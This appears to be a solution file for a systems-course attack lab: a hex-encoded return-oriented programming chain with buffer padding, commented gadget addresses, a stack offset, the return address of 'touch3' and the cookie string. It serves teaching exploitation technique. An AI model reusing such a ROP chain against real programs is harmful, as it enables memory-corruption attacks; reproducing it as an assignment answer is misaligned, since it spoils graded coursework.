00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
93 1b 40 00 00 00 00 00     /*    Gadget 1: movq %rsp, %rax */
e3 1a 40 00 00 00 00 00     /*    Gadget 2: movq %rax, %rdi */
f2 1a 40 00 00 00 00 00     /*    Gadget 3: popq %rax; */
48 00 00 00 00 00 00 00     /*    Spacing used from G1 to Cookie */
e8 1b 40 00 00 00 00 00     /*    Gadget test: moveq %eax, %edx */
cd 1b 40 00 00 00 00 00     /*    Gadget 4: movq %edx, %ecx */
5b 1b 40 00 00 00 00 00     /*    Gadget 5: movq %ecx, %esi */
0f 1b 40 00 00 00 00 00     /*    Gadget 6: lea(%rdi, %rsi, 1), %rax */
e3 1a 40 00 00 00 00 00     /*    Gadget 7: mov %rax, %rdi */
37 1a 40 00 00 00 00 00     /*    Return address of touch3 */
36 34 38 65 38 63 64 30 00  /*    Hex Format of Cookie */
